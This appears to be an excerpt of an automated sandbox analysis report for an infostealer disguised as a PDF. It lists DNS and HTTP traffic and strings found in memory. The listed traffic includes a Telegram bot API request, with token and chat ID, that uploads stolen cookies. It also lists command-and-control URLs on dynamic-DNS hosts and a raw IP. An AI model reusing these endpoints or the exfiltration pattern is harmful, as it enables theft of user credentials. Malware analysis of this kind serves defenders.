Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendDocument?chat_id=7437481970&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd348fc5d06ecdHost: api.telegram.orgContent-Length: 7046

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 13 Jan 2025 11:08:23 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 13 Jan 2025 11:08:35 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4126496252.0000000000434000.00000040.00000400.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4126496252.0000000000434000.00000040.00000400.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: svchost.exe, 00000004.00000002.3334847823.0000023633000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000004.00000003.1707895013.0000023633218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000004.00000003.1707895013.0000023633218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000004.00000003.1707895013.0000023633218000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000004.00000003.1707895013.000002363324D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.4.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000001.00000002.1709103269.0000000006049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1832407951.0000000004F32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1698162962.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1832407951.0000000004DE1000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4126496252.0000000000434000.00000040.00000400.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000006.00000002.1832407951.0000000004F32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 00000001.00000002.1698162962.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1832407951.0000000004DE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20a
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000037E1000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendDocument?chat_id=7437
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: powershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000004.00000003.1707895013.00000236332C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000004.00000003.1707895013.00000236332C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000006.00000002.1832407951.0000000004F32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1709103269.0000000006049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000004.00000003.1707895013.00000236332C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.4.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000371F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003101000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003170000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003101000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000371F000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.000000000312B000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003170000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048E3000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004A06000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000473F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000047B4000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004931000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000478D000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.00000000041DE000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004205000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004190000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004334000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004457000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004382000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000478F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000471A000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048E9000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004745000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000049E2000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000430F000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004432000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.00000000041E0000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004196000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000433A000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000416B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048E3000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004A06000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000473F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000047B4000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004931000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000478D000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.00000000041DE000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004205000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004190000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004334000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004457000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004382000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000478F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000471A000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048E9000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004745000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000049E2000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000430F000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004432000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.00000000041E0000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004196000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000433A000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000416B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
